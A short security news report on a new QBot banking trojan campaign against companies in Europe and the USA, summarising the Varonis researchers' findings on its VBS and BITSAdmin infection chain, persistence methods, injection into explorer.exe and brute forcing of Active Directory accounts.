Only a month has passed since the last QBot malware distribution campaign (also known as QakBot banking trojan), and now its new modification attacks companies in Europe and the USA again. Security researchers at Varonis discovered a wave of phishing attacks using a new incarnation of the infamous trojan. Adversaries retained QBot polymorphic features to avoid detection and added two infection vectors. Now malware is distributed via the archived VBS file, which uses the BITSAdmin tool to drop malware loader. The researchers found that each version of the loader is signed with a different digital certificate. To ensure the presence of malware on an attacked system, it copies itself to a randomly created folder in% Appdata%\Roaming\, schedules a task to execute itself every 5 hours and creates the LNK file in the Startup folder. When executing, the loader starts a new explorer.exe process and injects QBot into it. In addition to the traditional functions, the trojan conducts brute force attack targeted at network accounts from the Active Directory Domain Users group.
According to a published report, about 90% of infected systems are located in the United States. Threat actors behind the campaign use a number of C&C servers to which the stolen information is sent. It is also known that Windows Defender is installed on almost all infected systems. Recently, more and more malware families use BITSAdmin in the infection process.